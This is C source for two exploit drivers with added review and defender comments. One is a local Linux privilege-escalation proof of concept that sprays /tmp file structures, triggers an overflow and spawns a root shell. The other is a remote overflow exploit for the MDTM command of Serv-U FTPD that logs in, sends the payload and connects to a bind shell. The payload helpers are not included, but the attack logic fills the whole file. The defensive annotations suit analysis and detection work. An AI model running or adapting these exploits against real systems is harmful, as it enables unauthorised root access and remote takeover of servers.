/*
 * Entry point of a local privilege-escalation proof of concept.
 *
 * Visible flow: resolve kernel symbols (get_kernel_syms), open as many
 * files under /tmp as the process is allowed to, close a few of them
 * again, call do_overflow(), touch every descriptor, then test whether
 * the process may now switch to uid 0 and, if so, exec /bin/sh.
 * The vulnerability trigger itself is in do_overflow(), which is not
 * part of this block.
 *
 * argv[1] (optional): how many descriptors to close before the trigger;
 * defaults to 1. The original author suggests 3.
 *
 * Returns 1 only if execl() fails; exits with status 1 when
 * setresuid(0, 0, 0) is refused.
 *
 * Defender notes (all derived from the calls below):
 *   - The files /tmp/tmpfile0 .. /tmp/tmpfileN are never unlinked, so
 *     they remain on disk as a forensic artifact.
 *   - The creation loop only stops when open() fails, so the process
 *     typically runs into its descriptor limit.
 *   - A previously unprivileged process for which setresuid(0, 0, 0)
 *     succeeds and which then executes /bin/sh is a strong audit signal
 *     (setresuid / execve auditing).
 *   - NOTE(review): get_kernel_syms() presumably reads kernel symbol
 *     addresses; if so, hiding them from unprivileged users
 *     (e.g. kernel.kptr_restrict) and running a patched kernel are the
 *     relevant mitigations -- confirm against the helper's definition.
 */
int main(int argc, char ** argv)
{
    char path[100];
    int *fds;
    int count;
    int to_release;
    int k;

    get_kernel_syms();

    fds = malloc(sizeof(int));

    /*
     * Phase 1 (original comment: "Spray slab with file structs"):
     * keep creating /tmp/tmpfile<k> until open() reports an error.
     * NOTE(review): O_CREAT is used without a mode argument, so the
     * permission bits of the created files are indeterminate.
     */
    k = 0;
    while (1) {
        sprintf(path, "/tmp/tmpfile%d", k);
        fds = realloc(fds, (k + 1) * sizeof(int));
        fds[k] = open(path, O_RDWR | O_CREAT | O_SYNC);
        if (fds[k] < 0)
            break;
        k++;
    }
    count = k;
    printf("[+] Created %d files\n", count);

    /*
     * Phase 2: close some descriptors near the end of the table.
     * The original author notes that slab state cannot be inspected
     * here, so the layout may be off; argv[1] = 3 is their suggestion.
     */
    to_release = (argc > 1) ? atoi(argv[1]) : 1;
    for (k = 0; k < to_release; k++)
        close(fds[count - 4 - k]);

    /* Phase 3: the actual trigger lives in this helper (not shown). */
    do_overflow();

    /* Phase 4: write a 5-byte marker through every descriptor, then close. */
    for (k = 0; k < count; k++)
        write(fds[k], "YOUPI", 5);
    for (k = 0; k < count; k++)
        close(fds[k]);

    /* Phase 5: a non-zero result means the credential change was refused. */
    if (setresuid(0, 0, 0) != 0) {
        printf("[-] Exploit failed :(\n");
        exit(1);
    }

    setresgid(0, 0, 0);
    printf("[+] Launching root shell!\n");
    execl("/bin/sh", "/bin/sh", NULL);

    /* Only reached when execl() itself fails. */
    return 1;
}
/*
 * Command-line driver of a remote proof of concept which, according to
 * its own banner, targets the MDTM command of Serv-U FTPD 3.x/4.x/5.x.
 *
 * Visible flow: parse options, log in over FTP (ftp_login), hand the
 * control connection to do_overflow(), close it, wait three seconds,
 * open a second TCP connection to the same host on `shellport`, and
 * relay it to stdin/stdout through sh(). The payload is in
 * do_overflow(), which is not part of this block.
 *
 * Options: -h host, -t target index (stored in the global x, rejected
 * when above MAX_NUM), -u user, -p password, -P FTP port, -d port of the
 * second connection. "c:" is accepted by getopt but has no handler, so
 * it takes the help path like any unknown option.
 *
 * Returns 0 on the help path and after the relay ends, -1 when the
 * second connection fails; exits with 1 or -1 on usage/login errors.
 *
 * Defender notes (derived from the calls below):
 *   - This driver authenticates before sending anything else, so the
 *     FTP server's login records are a starting point for triage.
 *   - On the wire the pattern is: an FTP control session that ends,
 *     followed roughly three seconds later by a new connection from the
 *     same client to a different port on the server. That suggests the
 *     payload opens a listener there -- NOTE(review): confirm against
 *     do_overflow(). Default-deny inbound filtering for non-FTP ports
 *     and alerting on new listening sockets owned by the FTP service
 *     address exactly this step.
 *   - The banner names the affected product line; moving off those
 *     versions is the primary mitigation.
 *   - The "[email protected]" fragments in the banner look like the
 *     hosting page's e-mail obfuscation; the string is kept as found.
 */
int main (int c, char *v[])
{
	char *target = NULL;
	char *login = "******";
	char *secret = "******";
	int opt;
	int ctrl_fd;
	int shell_fd;

	/* Second-connection port starts out equal to the FTP port default. */
	shellport = port;

	fprintf (stderr,
		 "Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit "VER"\n"
		 "bug find by bkbll ([email protected]) code by Sam ([email protected])\n\n");

	if (c < 2) {
		showHELP (v[0]);
		exit (1);
	}

	while ((opt = getopt (c, v, "h:t:u:p:P:c:d:")) != EOF) {
		if (opt == 'h') {
			target = optarg;
		} else if (opt == 't') {
			x = atoi (optarg);
			if (x > MAX_NUM) {
				printf ("[-] wtf your input?\n");
				exit (-1);
			}
		} else if (opt == 'u') {
			login = optarg;
		} else if (opt == 'p') {
			secret = optarg;
		} else if (opt == 'P') {
			port = atoi (optarg);
		} else if (opt == 'd') {
			shellport = atoi (optarg);
		} else {
			/* Unknown option, or 'c', which has no handler. */
			showHELP (v[0]);
			return 0;
		}
	}

	/* NOTE(review): target is still NULL here when -h was not given. */
	ctrl_fd = ftp_login (target, port, login, secret);
	if (ctrl_fd <= 0) {
		printf ("[-] can't connnect\n");
		exit (-1);
	}

	do_overflow (ctrl_fd);
	close (ctrl_fd);

	/* Fixed pause before the follow-up connection is attempted. */
	sleep (3);

	/* Third argument is passed through as-is; presumably a timeout. */
	shell_fd = new_tcpConnect (target, shellport, 3000);
	if (shell_fd <= 0) {
		printf ("[-] failed\n");
		return -1;
	}

	fprintf (stderr, "[+] successed!!\n\n\n");

	/* Relay between local descriptors 0/1 and the new socket. */
	sh (0, 1, shell_fd);
	close (shell_fd);

	return 0;
}